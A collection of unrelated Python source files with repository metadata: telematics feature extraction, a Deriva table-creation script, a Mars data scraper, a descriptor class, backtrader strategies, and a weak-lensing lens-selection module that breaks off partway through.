Python
| false
| false
| 5,821
|
py
|
# -*- coding: utf-8 -*-
"""
(c) 2015
@author: Janto Oellrich
email: joellrich@uos.de
CONTENT:
Contains FEATURE EXTRACTION funtions for
the AXA telematics competition.
FUNCTION LIST:
features: creates feature vector for one trip
driverFrame: creates feature matrix containing features
of all trips of one driver
createFeatmat: create feature matrix for all drivers
"""
from load import *
from modules import *
from paths import *
def features(trip,plotting=False):
"""
Extracts features of a trip dataframe.
OUTPUT:
np.array including features
list of angles between points in deg
"""
# 1. duration
duration = len(trip)
# 2. speed: euclidean distance between adjacent points
speed = np.sum(np.diff(trip,axis=0)**2,axis=1)**0.5
### 2.1. smooth GPS data (by convolution) ####
smooth_speed = movingaverage(speed,10)
#smooth_speed[np.where(smooth_speed>65)[0]] = smooth_speed[np.where(smooth_speed>65)[0]-1]
# head changes
head = np.diff(trip,axis=0)
head_x,head_y = head[:,0],head[:,1]
head_quantiles_x = ss.mstats.mquantiles(head_x,np.linspace(0.02,0.99,10))
head_quantiles_y = ss.mstats.mquantiles(head_y,np.linspace(0.02,0.99,10))
# compute speed statistics
mean_speed = smooth_speed.mean()
max_speed = max(smooth_speed)
std_speed = speed.std()
# 3. acceleration
smooth_accel = np.diff(smooth_speed)
# 3.1 get all negative acceleration values
accel_s = np.array(smooth_accel)
neg_accel = accel_s[accel_s<0]
pos_accel = accel_s[accel_s>0]
# 3.3 average breaking strength
mean_breaking = neg_accel.mean()
mean_acceleration = pos_accel.mean()
# summary statistics
std_breaking = neg_accel.std()
std_acceleration = pos_accel.std()
# 4. total distance traveled
total_dist = np.sum(smooth_speed,axis=0)
# 5. relative standzeit (last 5% are discarded due standing)
last = round(len(trip)*0.05)
eps = 1 # threshold for determining standing
# relative standzeit
speed_red = np.array(speed)[:last]
standzeit = len(speed_red[speed_red<0+eps])/float(duration)
#### DRIVING STYLE REALTED FEATURES ####
# 1. acceleration from stop
# 1.1 get end of stops: where is speed near zero
end_stops = stops(smooth_speed)
n_stops = len(end_stops) # how many stops
# 1.2 how does the driver accelerate from stop?
end_stops = end_stops.astype(int)[:-1,1]
# following interval
interval = 7 # 7 seconds following end of stop
# only those which dont exceed indices of trip
end_stops = end_stops[end_stops+interval<len(smooth_speed)-1]
n_stops = len(end_stops)
if n_stops>1:
anfahren = np.zeros(shape=(1,n_stops)) # initialize array
for i in range(n_stops):
# slope at acceleration
start = end_stops[i]
anfahren[0,i] = np.diff([smooth_speed[start],smooth_speed[start+interval]])
else:
anfahren = np.array([0])
# compute statistics
mean_anfahren = anfahren.mean()
max_anfahren = anfahren.max()
std_anfahren = anfahren.std()
# end cell
last_cell = rounddown(normalize(trip[-2:,:]),30)[-1]
# determine trip is a back-home trip
if last_cell[0]==0 and last_cell[1]==0:
hometrip=1
else:
hometrip=0
# speed quantiles
speed_quantiles = ss.mstats.mquantiles(smooth_speed,np.linspace(0.02,0.99,25))
# acceleration quantiles
accel_quantiles = ss.mstats.mquantiles(smooth_accel,np.linspace(0.02,0.99,25))
################# PLOTS #################
if plotting:
figure()
x = range(1,len(trip)) # x values for plotting
#plot(x,total_dist,label='velocity') #speed
hold('on')
#plot(x,accel,color='red',alpha=0.6,label='acceleration') #acceleration
grid('on')
xlabel('time')
# plot smoothed speed data
plot(smooth_speed,color='k',label='Spline Interpol')
# plot smoothed accelerationd data
plot(smooth_accel,'red',label='Acceleration')
legend(loc='best')
#legend()
######################################
return np.concatenate((speed_quantiles,accel_quantiles,head_quantiles_x,head_quantiles_y,np.array([duration,total_dist,standzeit,std_speed,std_breaking,std_acceleration,std_anfahren,mean_anfahren,max_anfahren,n_stops,hometrip])))
def driverFrame(driver,n_features=10):
# initialize dataframe
trips = np.zeros(shape=(200,n_features))
# load all trips at once
all_trips = loadDriver(driver)
counter = 0
for trip in all_trips:
trips[counter,:] = features(trip,False)
counter += 1
return trips
def createFeatmat():
"""
Computes the features of all trips and stores them in a matrix.
"""
driverFolder = DATA
# driver IDs
drivers = sorted([int(folderName) for folderName in os.listdir(driverFolder)])
print 'Creating feature matrix...'
n_feat = 81
for i,driver in enumerate(drivers):
if i == 0:
featmat = driverFrame(driver,n_feat)
else:
featmat = np.vstack((featmat,driverFrame(driver,n_feat)))
print '\t\t{0} trips, {1} features'.format(featmat.shape[0],featmat.shape[1])
# write to file
np.save(os.path.join(FEATURES,'featurematrix1.npy'))
return featmat
|
[
"keesiu.wong@gmail.com"
] |
keesiu.wong@gmail.com
|
034075db05af08fc51f6883ff05c168ed826538f
|
e8b7d79faec702bc95b4563520413c61ffe1640d
|
/script/initialization/03_create_table_File.py
|
4514e72a398500418a35a23bf731820662d79b30
|
[
"Apache-2.0"
] |
permissive
|
informatics-isi-edu/nsf-core
|
8511f82df22da4eecb3ae6ee9e4033012915999b
|
8073c62fbf338e3e88430c136fa99772481174f2
|
refs/heads/master
| 2020-03-23T21:07:03.405120
| 2019-03-07T20:14:06
| 2019-03-07T20:14:06
| 142,082,834
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,809
|
py
|
from deriva.core import DerivaServer, get_credential
from deriva.core.ermrest_model import Table, Column, Key,ForeignKey,builtin_types as typ
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('hostname')
parser.add_argument('catalog_number')
parser.add_argument('schema_name')
args = parser.parse_args()
hostname = args.hostname
schema_name = args.schema_name
catalog = args.catalog_number
credential = get_credential(hostname)
server = DerivaServer('https', hostname, credential)
catalog = server.connect_ermrest(catalog)
model = catalog.getCatalogModel()
schema = model.schemas[schema_name]
config = catalog.getCatalogConfig()
column_defs = [
Column.define("Category_RID", typ.text),
Column.define("Name", typ.text),
Column.define("Description", typ.text),
Column.define("URI", typ.text),
Column.define("Size", typ.int4),
Column.define("MD5", typ.text),
]
key_defs = [
Key.define(
["Category_RID","Name"], # this is a list to allow for compound keys
constraint_names=[ [schema_name, "File_Category_RID_Name_key"] ],
comment="file category and file name must be distinct.",
annotations={},
)
]
fkey_defs = [
ForeignKey.define(
["Category_RID"], # this is a list to allow for compound foreign keys
"Vocab",
"File_Category",
["RID"], # this is a list to allow for compound keys
on_update='CASCADE',
on_delete='SET NULL',
constraint_names=[ [schema_name, "File_Category_RID_fkey"] ],
comment="",
acls={},
acl_bindings={},
annotations={},
)
]
table_def = Table.define(
"File",
column_defs,
key_defs=key_defs,
fkey_defs=fkey_defs,
comment="file information",
acls={},
acl_bindings={},
annotations={},
provide_system=True,
)
new_table = schema.create_table(catalog, table_def)
|
[
"35635511+ytfqj@users.noreply.github.com"
] |
35635511+ytfqj@users.noreply.github.com
|
305694dae099f4bf0087378a3e5018ba3d189b9e
|
795a37b6aeaaedc8b2c7b525a037b9533233bafb
|
/scrape_mars.py
|
c0dacb96bdbd5d720d581f4ec567e39b46f01891
|
[] |
no_license
|
arthurosakwe/mission_to_mars
|
8599eee09d157f1f42eb5b9cb588a4da3bcf8424
|
ac45c79749e603eda6d64a1a93e2f41f2168dd59
|
refs/heads/master
| 2020-04-07T18:07:44.580635
| 2018-11-21T21:25:03
| 2018-11-21T21:25:03
| 158,598,030
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,510
|
py
|
# coding: utf-8
# In[1]:
#import dependencies
from bs4 import BeautifulSoup as bs
from splinter import Browser
import os
import pandas as pd
import time
# In[2]:
def init_browser():
executable_path = {"executable_path":"C:\chromedriver_win32\chromedriver"}
return Browser("chrome", **executable_path, headless = False)
def scrape():
browser = init_browser()
mars_data = {}
nasa = "https://mars.nasa.gov/news/"
browser.visit(nasa)
time.sleep(2)
html = browser.html
soup = bs(html,"html.parser")
#scrapping latest news about mars from nasa
news_title = soup.find("div",class_="content_title").text
news_paragraph = soup.find("div", class_="article_teaser_body").text
mars_facts_data['news_title'] = news_title
mars_facts_data['news_paragraph'] = news_paragraph
#Mars Featured Image
nasa_image = "https://www.jpl.nasa.gov/spaceimages/?search=&category=featured#submit"
browser.visit(nasa_image)
time.sleep(2)
from urllib.parse import urlsplit
base_url = "{0.scheme}://{0.netloc}/".format(urlsplit(nasa_image))
xpath = "//*[@id=\"page\"]/section[3]/div/ul/li[1]/a/div/div[2]/img"
#Use splinter to click on the mars featured image
#to bring the full resolution image
results = browser.find_by_xpath(xpath)
img = results[0]
img.click()
time.sleep(2)
#get image url using BeautifulSoup
html_image = browser.html
soup = bs(html_image, "html.parser")
img_url = soup.find("img", class_="fancybox-image")["src"]
full_img_url = base_url + img_url
mars_facts_data["featured_image"] = full_img_url
# #### Mars Weather
#get mars weather's latest tweet from the website
url_weather = "https://twitter.com/marswxreport?lang=en"
browser.visit(url_weather)
html_weather = browser.html
soup = bs(html_weather, "html.parser")
mars_weather = soup.find("p", class_="TweetTextSize TweetTextSize--normal js-tweet-text tweet-text").text
mars_facts_data["mars_weather"] = mars_weather
# #### Mars Facts
url_facts = "https://space-facts.com/mars/"
time.sleep(2)
table = pd.read_html(url_facts)
table[0]
df_mars_facts = table[0]
df_mars_facts.columns = ["Parameter", "Values"]
clean_table = df_mars_facts.set_index(["Parameter"])
mars_html_table = clean_table.to_html()
mars_html_table = mars_html_table.replace("\n", "")
mars_facts_data["mars_facts_table"] = mars_html_table
return mars_data
|
[
"noreply@github.com"
] |
arthurosakwe.noreply@github.com
|
a5dc2d3eb8c1c3570c78cc8340e536ee6a689fad
|
41ab75ef3dbb7293c94aa0fd075316b90b930c27
|
/11.py
|
f1ed666ed6dcfca61daaebb54101b17c0c8222be
|
[] |
no_license
|
3232731490/Python
|
91716d8bcb8d2f193743118cd0bb73e4f307854c
|
1a76a2b4d1f21c4e2caece507f1655c3eb751aa9
|
refs/heads/main
| 2023-02-05T11:46:08.915601
| 2020-12-27T11:36:24
| 2020-12-27T11:36:24
| 324,100,187
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 569
|
py
|
class cenius:
def __init__(self,value=20.0):
print('init')
self.value=float(value)
def __get__(self,instance,owner):
print('cel_get')
return self.value
def __set__(self,instance,value):
print('cel_set')
self.value=float(value)
class Huashi:
def __get__(self,instance,oener):
print('huashi_get')
return instance.cel*1.8+32
def __set__(self,instance,value):
print('huashi_set')
instance.cel=(float(value)-32.0)/1.8
class Temp:
cel=cenius()
huashi=Huashi()
|
[
"3232731490@qq.com"
] |
3232731490@qq.com
|
6f0f37984334bfa33641cc9897992255772952bf
|
712a494b06e1f48c158e0286d3e604c64f7d2e87
|
/backtrader/bt_step5.py
|
af73c528744820beb09a4b91aa72d36894f023b0
|
[] |
no_license
|
juvu/ccxt_test
|
db0b6d9080bb59981ab748087b4a8cc3220c7922
|
842b42176b961cad690dd9e70b63a9a2e34216e5
|
refs/heads/master
| 2022-03-24T20:39:05.624946
| 2019-11-21T15:25:08
| 2019-11-21T15:25:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,917
|
py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import datetime # For datetime objects
import os.path # To manage paths
import sys # To find out the script name (in argv[0])
import pandas as pd
# Import the backtrader platform
import backtrader as bt
import backtrader.indicators as btind
import backtrader.feeds as btfeeds
class MyStrategy2(bt.Strategy):
params = dict(period=20)
def __init__(self):
self.movav = btind.SimpleMovingAverage(self.data, period=self.p.period)
def next(self):
if self.movav.lines.sma[0] > self.data.lines.close[0]:
print('Simple Moving Average is greater than the closing price')
# Create a subclass of Strategy to define the indicators and logic
class SmaCross(bt.Strategy):
# list of parameters which are configurable for the strategy
params = dict(
pfast=10, # period for the fast moving average
pslow=30 # period for the slow moving average
)
def __init__(self):
sma1 = bt.ind.SMA(period=self.p.pfast) # fast moving average
sma2 = bt.ind.SMA(period=self.p.pslow) # slow moving average
self.crossover = bt.ind.CrossOver(sma1, sma2) # crossover signal
def next(self):
if not self.position: # not in the market
if self.crossover > 0: # if fast crosses slow to the upside
self.buy() # enter long
elif self.crossover < 0: # in the market & cross to the downside
self.close() # close long position
# Create a subclass of Strategy to define the indicators and logic
class CdmaCross(bt.Strategy):
# list of parameters which are configurable for the strategy
params = (
# Standard MACD Parameters
('macd1', 12),
('macd2', 26),
('macdsig', 9),
('atrperiod', 14), # ATR Period (standard)
('atrdist', 3.0), # ATR distance for stop price
('smaperiod', 30), # SMA Period (pretty standard)
('dirperiod', 10), # Lookback period to consider SMA trend direction
)
def __init__(self):
self.macd = bt.indicators.MACD(self.data,
period_me1=self.p.macd1,
period_me2=self.p.macd2,
period_signal=self.p.macdsig)
# Cross of macd.macd and macd.signal
self.mcross = bt.indicators.CrossOver(self.macd.macd, self.macd.signal)
# Control market trend
self.sma = bt.indicators.SMA(self.data, period=self.p.smaperiod)
self.smadir = self.sma - self.sma(-self.p.dirperiod)
def start(self):
self.order = None # sentinel to avoid operrations on pending order
def next(self):
if self.order:
return # pending order execution
if not self.position: # not in the market
if self.mcross[0] > 0.0 and self.smadir < 0.0:
self.order = self.buy()
# pdist = self.atr[0] * self.p.atrdist
# self.pstop = self.data.close[0] - pdist
else: # in the market
pclose = self.data.close[0]
pstop = self.pstop
if pclose < pstop:
self.close() # stop met - get out
else:
pdist = self.atr[0] * self.p.atrdist
# Update only if greater than
self.pstop = max(pstop, pclose - pdist)
# Create a Stratey
class TestStrategy(bt.Strategy):
def log(self, txt, dt=None):
''' Logging function for this strategy'''
dt = dt or self.datas[0].datetime.date(0)
print('%s, %s' % (dt.isoformat(), txt))
def __init__(self):
# Keep a reference to the "close" line in the data[0] dataseries
self.dataclose = self.datas[0].close
# To keep track of pending orders
self.order = None
def notify_order(self, order):
if order.status in [order.Submitted, order.Accepted]:
# Buy/Sell order submitted/accepted to/by broker - Nothing to do
return
# Check if an order has been completed
# Attention: broker could reject order if not enough cash
if order.status in [order.Completed]:
if order.isbuy():
self.log('BUY EXECUTED, %.2f' % order.executed.price)
elif order.issell():
self.log('SELL EXECUTED, %.2f' % order.executed.price)
self.bar_executed = len(self)
elif order.status in [order.Canceled, order.Margin, order.Rejected]:
self.log('Order Canceled/Margin/Rejected')
# Write down: no pending order
self.order = None
def next(self):
# Simply log the closing price of the series from the reference
self.log('Close, %.2f' % self.dataclose[0])
# Check if an order is pending ... if yes, we cannot send a 2nd one
if self.order:
return
# Check if we are in the market
if not self.position:
# Not yet ... we MIGHT BUY if ...
if self.dataclose[0] < self.dataclose[-1]:
# current close less than previous close
if self.dataclose[-1] < self.dataclose[-2]:
# previous close less than the previous close
# BUY, BUY, BUY!!! (with default parameters)
self.log('BUY CREATE, %.2f' % self.dataclose[0])
# Keep track of the created order to avoid a 2nd order
self.order = self.buy()
else:
# Already in the market ... we might sell
if len(self) >= (self.bar_executed + 5):
# SELL, SELL, SELL!!! (with all possible default parameters)
self.log('SELL CREATE, %.2f' % self.dataclose[0])
# Keep track of the created order to avoid a 2nd order
self.order = self.sell()
if __name__ == '__main__':
# Create a cerebro entity
cerebro = bt.Cerebro()
# Add a strategy
# cerebro.addstrategy(SmaCross)
cerebro.addstrategy(CdmaCross)
# Datas are in a subfolder of the samples. Need to find where the script is
# because it could have been called from anywhere
modpath = os.path.join(os.getcwd(), 'data')
if not os.path.exists(modpath):
os.makedirs(modpath)
datapath = os.path.join(modpath, 'dfqc.csv')
dataframe = pd.read_csv(datapath, index_col=0, parse_dates=True)
dataframe['openinterest'] = 0
data = bt.feeds.PandasData(dataname=dataframe,
fromdate=datetime.datetime(2015, 1, 1),
todate=datetime.datetime(2016, 12, 31)
)
# ————————————————
# 版权声明:本文为CSDN博主「钱塘小甲子」的原创文章,遵循
# CC
# 4.0
# BY - SA
# 版权协议,转载请附上原文出处链接及本声明。
# 原文链接:https: // blog.csdn.net / qtlyx / article / details / 70945174
# Create a Data Feed
# data = bt.feeds.YahooFinanceCSVData(
# dataname=datapath,
# # Do not pass values before this date
# fromdate=datetime.datetime(2014, 2, 1),
# # Do not pass values before this date
# todate=datetime.datetime(2014, 12, 31),
# # Do not pass values after this date
# reverse=False)
# Add the Data Feed to Cerebro
cerebro.adddata(data)
# Set our desired cash start
cerebro.broker.setcash(100000.0)
# Print out the starting conditions
print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())
# Run over everything
cerebro.run()
# Print out the final result
print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())
# Plot the result
cerebro.plot()
|
[
"flyhawksz@163.com"
] |
flyhawksz@163.com
|
1c8d05e67cfb13334be391982bc7649233111970
|
56ffe678e18f00661d55bbedf28b3d37edb54434
|
/weaklens_select.py
|
1ce8ca51dad0991a95d971b5784603cc523f675a
|
[] |
no_license
|
amitkiucaa/weaklens_pipeline_by_Surhud_modified_by_Amit
|
dd05d862878edb4836fb77177f6ebc40a5296579
|
f9bf5ddd6f4a69fa449ce8163dadf54c80234312
|
refs/heads/master
| 2022-12-01T13:03:55.669033
| 2020-08-23T12:08:21
| 2020-08-23T12:08:21
| 284,535,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 63,745
|
py
|
import numpy as np
from astropy.io import fits as pyfits
from astropy.io import fits
import pandas
import sys
import fitsio
import glob
from sqlitedict import SqliteDict
import gnupg
gpg = gnupg.GPG()
def FITS_to_PGP(message):
"""
Turns a string stored into an FITS comment back into a proper
PGP message
"""
s = "-----BEGIN PGP MESSAGE-----\n\n"
s += message
s += "\n-----END PGP MESSAGE-----\n"
return s
# This is the function which you will use to decrypt the string
def decrypt_string(encrypted_string):
#string = getpass.getpass(prompt="Enter passphrase to unlock the private key:\n")
decrypted_data = gpg.decrypt(encrypted_string) #, passphrase=string)
print 'ok: ', decrypted_data.ok
print 'status: ', decrypted_data.status
#print 'stderr: ', decrypted_data.stderr
#print 'Decrypted string (additive m value for the catalog): ', decrypted_data.data
return decrypted_data.data
def lens_select(lensargs):
"""
lens_select(dictionary lensargs)
Selects lens sample
:Parameters:
- lensargs : Dictionary read from the config file which contains various
cuts on the lens sample
:Returns:
- ra : Right ascension in degrees
- dec : Declination in degrees
- zred : Redshift
- weight : Weights for the lenses
:Adding new samples:
Add new samples by copy pasting one of the lensargs block and then modifying them according to your will
"""
if lensargs["type"] == "generic":
hdulist = pyfits.open(lensargs["fname"])
data = hdulist[1].data
ra = data["ra"].astype("float64")
dec = data["dec"].astype("float64")
z = data["z"].astype("float64")
wt = data["wt"].astype("float64")
sys.stdout.write("Selecting %d samples \n" % (ra.size))
return ra, dec, z, wt
# Use generic text file with the columns:
# ra (deg), dec (deg), z, lens_wt
# Any lines beginning with "#" are ignored
if lensargs["type"] == "generic-text":
data = pandas.read_csv(lensargs["fname"], delim_whitespace=1, header=None, names=(["ra", "dec", "z", "wt"]), comment="#")
ra = data["ra"].values.astype("float64")
dec = data["dec"].values.astype("float64")
z = data["z"].values.astype("float64")
wt = data["wt"].values.astype("float64")
sys.stdout.write("Selecting %d samples \n" % (ra.size))
return ra, dec, z, wt
if lensargs["type"] == "gama":
hdulist = pyfits.open(".//home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/gama/G3CFOFGroup.fits")
data = hdulist[1].data
ra = data["IterCenRA"].astype("float64") #ra of galaxies in the lense
dec = data["IterCenDec"].astype("float64") #dec of galaxies in the lense
z = data["IterCenZ"].astype("float64") #redshift of galaxies in the lense
vdisp=data["VelDisp"].astype("float64")
idx = (z>lensargs["zmin"]) & (z<=lensargs["zmax"]) & (vdisp>lensargs["vdispmin"]) & (vdisp<=lensargs["vdispmax"])
ra = ra[idx]
dec = dec[idx]
z = z[idx]
vdisp = vdisp[idx]
wt = ra/ra
sys.stdout.write("Selecting %d samples \n" % (ra.size))
return ra, dec, z, wt
if lensargs["type"] == "mgii-absorbers-ran":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/INFO_140303_Ref_Mg_II_DR79_match.fits")
data = hdulist[1].data
ra = data["ra"].astype("float64")
dec = data["dec"].astype("float64")
zabs = data["zabs"].astype("float64")
idx = (zabs>lensargs["zmin"]) & (zabs<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zabs = zabs[idx]
wt = ra/ra
sys.stdout.write("Selecting %d samples \n" % (ra.size))
return ra, dec, zabs, wt
if lensargs["type"] == "mgii-absorbers":
hdulist = pyfits.open("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/INFO_140303_Mg_II_DR79_match.fits")
data = hdulist[1].data
ra = data["ra"].astype("float64")
dec = data["dec"].astype("float64")
zabs = data["zabs"].astype("float64")
idx = (zabs>lensargs["zmin"]) & (zabs<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zabs = zabs[idx]
wt = ra/ra
sys.stdout.write("Selecting %d samples \n" % (ra.size))
return ra, dec, zabs, wt
if lensargs['type'] == "hsc-cmass-subsample-random":
df = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/HSC_CMASS/CMASS_K+E_v0.99.dat", delim_whitespace=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
wt = (df.weight_noz.values + df.weight_cp.values - 1.0)* df.weight_star.values
iMag = df.Mag_Wake.values
idx = (iMag>lensargs["iMagmin"]) & (iMag<=lensargs["iMagmax"]) & (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
# First compute the selection function as a function of redshift
idxall = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
zarr = np.linspace(lensargs["zmin"], lensargs["zmax"], 20)
selarr = np.zeros(zarr.size-1)
for i in range(1, zarr.size):
selarr[i-1] = np.sum(idx & (zred>zarr[i-1]) & (zred<=zarr[i]))*1.0/np.sum(idxall & (zred>zarr[i-1]) & (zred<=zarr[i]))
print i, selarr[i-1], "\n================="
zarr = zarr[:-1]/2. + zarr[1:]/2.
from scipy.interpolate import UnivariateSpline
selspl = UnivariateSpline(zarr, selarr, bbox=(lensargs["zmin"], lensargs["zmax"]), ext=1)
with SqliteDict("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/HSC_CMASS/randoms/ran%03d.sqlite3" % (lensargs["rannum"])) as data:
ra = data["ra"]
dec = data["dec"]
zred = data["z"].astype('float64')
wt = data["weight"].astype("float64")
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
np.random.seed(lensargs["rannum"])
rannum = np.random.random(size=ra.size)
idx = (rannum<selspl(zred))
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
sys.stdout.write("Selecting %d samples \n" % (ra.size))
#jackreg = getregions(ra, dec, lensargs["jackregfile"])
return ra, dec, zred, wt #, jackreg
if lensargs['type'] == "hsc-lowz-subsample":
df = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/HSC_LOWZ/LOWZ_K+E_v0.99.dat", delim_whitespace=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
wt = (df.weight_noz.values + df.weight_cp.values - 1.0)* df.weight_star.values
iMag = df.Mag_Wake.values
idx = (iMag>lensargs["iMagmin"]) & (iMag<=lensargs["iMagmax"]) & (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
if lensargs['selection_write'] == 1:
idxall = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
zarr = np.linspace(lensargs["zmin"], lensargs["zmax"], 20)
selarr = np.zeros(zarr.size-1)
for i in range(1, zarr.size):
selarr[i-1] = np.sum(idx & (zred>zarr[i-1]) & (zred<=zarr[i]))*1.0/np.sum(idxall & (zred>zarr[i-1]) & (zred<=zarr[i]))
print i, selarr[i-1], "\n================="
zarr = zarr[:-1]/2. + zarr[1:]/2.
dfsel = pandas.DataFrame(zarr, columns=(["zred"]))
dfsel["sel"] = selarr
dfsel.to_csv(lensargs["selection"], index=False, sep=" ")
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
iMag = iMag[idx]
sys.stdout.write("Selecting %d samples \n" % (ra.size))
#jackreg = getregions(ra, dec, lensargs["jackregfile"])
return ra, dec, zred, wt #, jackreg
if lensargs['type'] == "hsc-cmass-subsample":
df = pandas.read_csv("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/HSC_CMASS/CMASS_K+E_v0.99.dat", delim_whitespace=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
wt = (df.weight_noz.values + df.weight_cp.values - 1.0)* df.weight_star.values
iMag = df.Mag_Wake.values
idx = (iMag>lensargs["iMagmin"]) & (iMag<=lensargs["iMagmax"]) & (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
if lensargs['selection_write'] == 1:
idxall = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
zarr = np.linspace(lensargs["zmin"], lensargs["zmax"], 20)
selarr = np.zeros(zarr.size-1)
for i in range(1, zarr.size):
selarr[i-1] = np.sum(idx & (zred>zarr[i-1]) & (zred<=zarr[i]))*1.0/np.sum(idxall & (zred>zarr[i-1]) & (zred<=zarr[i]))
print i, selarr[i-1], "\n================="
zarr = zarr[:-1]/2. + zarr[1:]/2.
dfsel = pandas.DataFrame(zarr, columns=(["zred"]))
dfsel["sel"] = selarr
dfsel.to_csv(lensargs["selection"], index=False, sep=" ")
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = wt[idx]
iMag = iMag[idx]
sys.stdout.write("Selecting %d samples \n" % (ra.size))
#jackreg = getregions(ra, dec, lensargs["jackregfile"])
return ra, dec, zred, wt #, jackreg
if lensargs['type'] == "SDSS-QSOs-John":
fname = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/SDSS_QSOs_zlt1.asc"
dfreal = pandas.read_csv(fname, delim_whitespace=1, names=(["ra", "dec", "z"]), usecols=([1, 2, 7]))
ra = dfreal["ra"].values
dec = dfreal["dec"].values
zred = dfreal["z"].values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "Masato-mock-forreq-random-full":
rannum = lensargs['rannum']
rotation = lensargs['rotation']
realization = lensargs['realization']
files = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD_full/random_*")
np.random.seed(rannum)
for i, fname in enumerate(files):
tractreg = fname.split("_")[-1]
realfile = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD_full/r%03d_rotmat%d_%s" % (realization, rotation, tractreg)
dfreal = pandas.read_csv(realfile, delim_whitespace=1, skiprows=1, names=(["ra", "dec", "z"]), usecols=([1, 2, 3]))
Nreal = dfreal.ra.values.size
rowstart = rannum * Nreal
if i==0:
df = pandas.read_csv(fname, delim_whitespace=1, skiprows=1+rowstart, names=(["ra", "dec", "z"]), usecols=([0, 1, 2]), nrows=Nreal)
else:
dfp = pandas.read_csv(fname, delim_whitespace=1, skiprows=1+rowstart, names=(["ra", "dec", "z"]), usecols=([0, 1, 2]), nrows=Nreal)
df = df.append(dfp, ignore_index=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "Masato-mock-forreq-random":
rannum = lensargs['rannum']
rotation = lensargs['rotation']
realization = lensargs['realization']
files = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD/random_*")
np.random.seed(rannum)
for i, fname in enumerate(files):
tractreg = fname.split("_")[-1]
realfile = "/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD/r%03d_rotmat%d_%s" % (realization, rotation, tractreg)
dfreal = pandas.read_csv(realfile, delim_whitespace=1, skiprows=1, names=(["ra", "dec", "z"]), usecols=([1, 2, 3]))
Nreal = dfreal.ra.values.size
rowstart = rannum * Nreal
if i==0:
df = pandas.read_csv(fname, delim_whitespace=1, skiprows=1+rowstart, names=(["ra", "dec", "z"]), usecols=([0, 1, 2]), nrows=Nreal)
else:
dfp = pandas.read_csv(fname, delim_whitespace=1, skiprows=1+rowstart, names=(["ra", "dec", "z"]), usecols=([0, 1, 2]), nrows=Nreal)
df = df.append(dfp, ignore_index=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "Masato-mock-forreq-full":
realization = lensargs['realization']
rotation = lensargs['rotation']
files = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD_full/r%03d_rotmat%d_*" % (realization, rotation))
for i, fname in enumerate(files):
if i==0:
df = pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3]))
else:
df = df.append(pandas.read_csv(fname, delim_whitespace=1, skiprows=1, names=(["id", "ra", "dec", "z"]), usecols=([0, 1, 2, 3])), ignore_index=1)
ra = df.ra.values
dec = df.dec.values
zred = df.z.values
idx = (zred>lensargs["zmin"]) & (zred<=lensargs["zmax"])
ra = ra[idx]
dec = dec[idx]
zred = zred[idx]
wt = ra/ra
sys.stdout.write("Selecting %d lenses \n" % (ra.size))
return ra, dec, zred, wt
if lensargs['type'] == "Masato-mock-forreq":
realization = lensargs['realization']
rotation = lensargs['rotation']
files = glob.glob("/home/amit/Desktop/Covid_backup/github/weaklens_pipeline/DataStore/Mocks_HOD/r%03d_rotmat%d_*" % (realization, rotation))
